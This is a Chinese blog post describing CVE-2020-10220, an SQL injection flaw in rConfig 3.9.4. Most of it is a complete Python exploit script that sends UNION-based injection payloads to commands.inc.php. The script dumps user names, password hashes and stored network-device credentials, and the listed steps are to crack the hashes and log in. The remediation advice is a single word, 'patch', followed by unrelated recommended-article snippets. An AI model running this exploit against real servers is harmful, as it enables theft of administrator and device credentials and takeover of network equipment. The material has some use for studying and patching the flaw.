rConfig v3.9.4 sql注入(CVE-2020-10220)

最新推荐文章于 2024-06-15 09:32:52 发布
最新推荐文章于 2024-06-15 09:32:52 发布
阅读量605 收藏 10
点赞数 12
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135355200
版权
本文描述了rConfig3.9.4版本中的SQL注入漏洞,攻击者可通过外部输入执行非法SQL命令。文章详细展示了复现漏洞的过程,并提供了利用exploit获取数据库信息的方法。最后,给出了针对该漏洞的修复建议,强调了对用户输入进行数据库验证的重要性。
摘要由CSDN通过智能技术生成

漏洞描述:

rConfig是一款开源的网络配置管理实用程序。 rConfig 3.9.4及之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。

复现过程:

1.访问ip:port

2.利用exp获取用户名密码

3.md5解密

4.利用用户名密码登录

exp文件如下:

import requests

import sys

import urllib.parse

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print ("rconfig 3.9 - SQL Injection PoC")

if len(sys.argv) != 2:

    print ("[+] Usage : ./rconfig_exploit.py https://target")

    exit()

vuln_page="/commands.inc.php"

vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"

given_target = sys.argv[1]

target =  given_target

target += vuln_page

target += vuln_parameters

request = requests.session()

dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)

def extractDBinfos(myTarget=None,myPayload=None):

        """

        Extract information from database

        Args:

                - target+payload (String)

        Returns:

                - payload result (String)

        """

        result = ""

        encoded_request = myTarget+myPayload

        exploit_req = request.get(encoded_request)

        if '[PWN]' in str(exploit_req.content):

                result = str(exploit_req.content).split('[PWN]')[1]

        else:

                result="Maybe no more information ?"

        return result

if dashboard_request.status_code != 404:

        print ("[+] Triggering the payloads on "+given_target+vuln_page)

        # get the db name

        print ("[+] Extracting the current DB name :")

        db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"

        db_name = extractDBinfos(target,db_payload)

        print (db_name)

    # DB extract users

        print ("[+] Extracting 10 first users :")

        for i in range (0, 10):

            user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"

            user_h = extractDBinfos(target,user1_payload)

            #print ("[+] Dump device "+str(i))

            print (user_h)

    # DB extract devices information

        print ("[+] Extracting 10 first devices :")

        for i in range (0, 10):

            device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"

            device_h = extractDBinfos(target,device_payload)

            #print ("[+] Dump device "+str(i))

            print (device_h)

    

        print ("Done")

                       

else:

    print ("[-] Please verify the URI")

    exit()

修复建议:

1.补丁

慕筱蚺
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rConfig v3.9.2 授权认证与未授权RCE (CVE-2019-16663) 、(CVE-2019-16662)
17bdw的编程备份笔记
11-12 77
rConfig v3.9.2 authenticated and unauthenticated RCE (CVE-2019-16663) and (CVE-2019-16662) 原文:https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-1...
第二个配置404_研究员公开网络设备配置管理开源程序 rConfig 中两个严重的 RCE 0day 漏洞(PoC 和详情)...
weixin_29532173的博客
12-16 405
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队如果你使用的是流行的 rConfig 网络配置管理工具保护并管理网络设备的话要注意了!安全研究员 Askar 发布了该工具中存在的两个未修复 RCE 漏洞的详情和 PoC。至少其中一个漏洞可导致身份未验证的远程攻击者攻陷目标服务器和联网网络设备。奇安信代码卫士将该Askar的博客文章翻译如下:rConfig 概述rConfig...
rconfig:rConfig-网络配置管理
05-16
支持和故障排除rConfig 请查看我们的故障排除文档,以获取有关问题的帮助 安装 可以在上找到在线指南,以帮助您完成安装过程。 在支持部分中查看最新的安装指南 配置文件 rConfig是一个免费的开源网络设备配置管理实用程序,网络工程师可以获取其网络设备的频繁配置快照。 rConfig是唯一的,因为您可以选择要针对设备运行的命令。 只需使用要应用于设备类别的命令列表配置rConfig,然后将设备添加到该类别。 创建一个计划任务,其余的由rConfig完成。 现在,rConfig版本3具有配置合规性管理实用程序,使您可以监视设备配置是否符合策略。 rConfig是完全开源的,这意味着您可以自定义它,并随意添加功能。 rConfig用本机PHP编写。 您无需在PHP上安装任何其他模块即可使用rConfig。 特征 免费和开源 可自定义的设备命令 多供应商支持的连接模板 数据库密码加密
**简化配置管理:RConfig—Ruby应用的全面解决方案**
最新发布
gitblog_00014的博客
06-15 304
简化配置管理:RConfig—Ruby应用的全面解决方案 项目地址:https://gitcode.com/rahmal/rconfig 项目介绍 在复杂的软件开发环境中,配置文件的管理和维护往往成为令人头疼的问题,尤其是当涉及多环境和主机特定配置时。RConfig正是为了解决这一难题而生——它是一款专为Ruby应用程序设计的配置管理库。通过提供统一、灵活且高效的方法来处理各种类型的配置文件(包括...
rconfig-cve_2019_16662
m0_49025459的博客
12-14 403
直接访问IP:login.php查看特征。
2020-10-26 SQL注入学习(2)
qq_45766062的博客
10-28 304
一.get请求与post请求的区别: (1)get在浏览器回退时是无害的,post会再次提交请求; (2)get产生的url地址可以被bookmark(加入标签),post不可以; (3)get请求只能进行url编码,post可以进行多种编码; (4)get请求参数会被完整保留在浏览器历史记录中,post不会(无痕浏览); (5)对参数的数据类型,get只接受ASCII字符,post没有限制; (6)Get请求在url中传递的参数长度有限制,post没有; (7)Get比post更不安全,因为参数直接暴露在
cmake-3.9.4-win32-x86.zip
02-03
`cmake-3.9.4-win32-x86.zip` 是CMake的一个版本包,针对Windows 32位操作系统。这个版本是3.9.4,发布于该版本的生命周期内,可能包含了一些针对当时已知问题的修复和功能改进。安装这个版本的CMake,可以让你在32...
cmake-3.9.4-win32-x86.msi
02-03
cmake 安装包
cmake-3.9.4-win64-x64.zip
02-03
"cmake-3.9.4-win64-x64.zip" 是CMake的一个特定版本,即3.9.4,适用于Windows 64位操作系统。这个压缩包包含了CMake的完整安装程序,用户可以通过解压并运行安装程序来进行安装。 在安装CMake时,通常会包含以下...
apache-maven-3.9.4-bin.zip
09-18
在描述中提到,这个压缩包是“apache-maven-3.9.4-bin.zip”,这意味着它包含了Maven的二进制文件,用户无需进行复杂的安装步骤,只需解压缩即可直接使用。这对于开发者来说非常方便,尤其是在跨平台或快速设置开发...
apache-maven-3.9.4.zip
08-04
apache-maven-3.9.4.zip压缩包内容: apache-maven-3.9.4-bin.tar.gz apache-maven-3.9.4-bin.zip apache-maven-3.9.4-src.tar.gz apache-maven-3.9.4-src.zip
Convert Single Instance DB to RAC DB using rconfig
voyager3的博客
08-17 854
This passage will lead you convert Single Instance DB to RAC DB.
搭建自己的服务器
weixin_43221608的博客
01-23 556
阿里服务器搭建web环境购买阿里服务器1.安装数据库启动MySQL数据库\查询MySQL运行状态查看mysql 的初始化密码登录数据库,并输入密码使用命令前,需要用ALTER USER命令修改密码,否则会报错创建数据库mysql数据库开启远程连接修改root用户的host字段使本次修改立即生效使用Navicat客户端就可以连接mysql,进行操作数据库了2.安装JDK查看服务器是否已安装JDK查看可安装版本安装JDK1.8配置环境变量执行以下命令使环境变量生效3.安装redis4.安装RabbitMQ 购买
Redis之《狂神说》学习笔记
R的博客
12-07 1966
Redis之《狂神说》学习笔记
Linux环境安装Redis
wohaipagui的博客
05-17 397
一、下载Redis并且解压 下载路径:链接:https://pan.baidu.com/s/16xEgQMr0mGj7kBERXwxaKQ 提取码:tlo3 1、上传到Linux服务器并且放置到/opt目录下(上传什么工具都可以) 博主喜欢用finalshell 链接:https://pan.baidu.com/s/1WYp52VWcbjcACc8PAk3tpQ 提取码:9r1l cd /opt 2、解压Redis压缩文件 tar -zxvf redis-7.0.0.tar.gz 3、进入解压后的文件
weblogic-cve_2020_2555漏洞复现
0day
01-28 1862
weblogic-cve_2020_2555漏洞复现 漏洞概述: 该漏洞于2020年1月在网上爆出,属于weblogic反序列化漏洞,漏洞原因是Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令。 漏洞复现: Vulfocus平台拉取下载启动漏洞镜像环境: 访问漏洞环境地址端口11317,该端口映射在weblogic的服务端口7001,在url地址栏输入ip端口后添加
vulfocus 靶机环境搭建部署
热门推荐
csd_ct的专栏
11-05 2万+
vulfocus 本质上是一个漏洞集成平台,里面集成了大量的CVE漏洞环境,采用的是docker环境部署安装,使用起来方便,可作为一个优秀靶场环境,提升实战能力。可本地部署安装,也可以直接使用线上环境vulfocus (fofa.so)http://vulfocus.fofa.so/#/login?redirect=%2Fdashboard 类似的漏洞集成环境,如vulhub也是一个不错的实验环境,不过vulfocus的漏洞都比较新,但数量少,vulhub收集的漏洞个数较多,但大多...
CentOS上安装Redis
仙女的博客
04-10 240
Redis是撒子? Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。edis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,很大程度补偿了memcached这类key/value存储的不足...
apache-maven-3.9.4-bin.tar.gz
11-11
apache-maven-3.9.4-bin.tar.gz 是 Apache Maven 的一个版本,Maven 是一个基于项目对象模型(Project Object Model)的项目管理工具。它可以帮助项目管理者自动化构建、依赖管理和文档发布等工作,它基于约定优于配置的原则,可以帮助开发人员更加高效地进行项目开发。 这个版本的 Apache Maven 包含了二进制文件(bin)和以.tar.gz 格式打包的压缩文件。用户可以通过解压缩这个文件来获得 Maven 的安装包,然后通过相应的配置,便可使用 Maven 进行项目管理工作。 在使用时,用户需要注意选择适合自己系统的版本进行下载和安装。此外,还需要根据官方文档进行相应的配置和使用方法学习,以便能更好地利用 Apache Maven 来管理自己的项目。 总的来说,apache-maven-3.9.4-bin.tar.gz 是 Apache Maven 的一个特定版本的安装包,通过安装这个软件,用户可以获得一个强大的项目管理工具,帮助他们更加高效和规范地进行软件开发项目的管理工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值